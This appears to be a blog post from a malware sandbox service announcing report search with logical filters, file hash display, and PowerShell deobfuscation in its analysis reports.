Triage Thursday

Search, Powershell Deobfuscation, and File Hash Display


Welcome back to our weekly Triage Thursday Friday blog series. We’re a day late with the blog this week, as we’ve been working to put the finishing touches to a major new feature. Today we are pleased to introduce Triage’s new Search functionality, a major update we’ve been working on for quite some time. It allows filtering analysis reports based on a range of Triage metadata (e.g., family names and tags) and behavioural IoCs.

Search has been heavily requested by users and we have done our best to accommodate as many use-cases as possible in this initial release. We’ll go into more detail on the new feature below. Currently it is only available on our public cloud at - we will be rolling it out to private cloud instances over the coming weeks.

Alongside Search we are also releasing a couple of other new features. Firstly another widely requested feature, visible hashes for dropped files. These can be found in the Download section at the bottom of each report, and include MD5, SHA1, SHA256 and SHA512 hashes for each file (note that this does not include memory dumps).

Secondly, we have been working to expand Triage’s support for Powershell scripts. In today’s update, Powershell detected during analysis is now deobfuscated and made visible directly through the report UI, making it easier to compare code and find similar analyses.

We hope these new features help you to find data more easily and get more out of Triage. We’re looking forward to hearing your feedback on them - you can get in touch through the website, on Twitter, or using the Feedback option in the Triage UI.

We wanted Search to enable users to carry out some basic threat hunting, rather than just locating specific files. To this end the initial version supports a range of filters and logical operators to build complex queries based on analysis results.

Let’s take a look at the available filters:

These filters can be combined with logical operators AND, OR, and NOT, to form longer queries as previously shown. You can find some examples to get started on the Search page.

Most prevalently might be the following query, which ignores all Emotet analyses. There are days where processes tens of thousands of Emotet samples, essentially making our UI useless. On those days this query can help you browsing our reports:

NOT family:emotet

You may also like: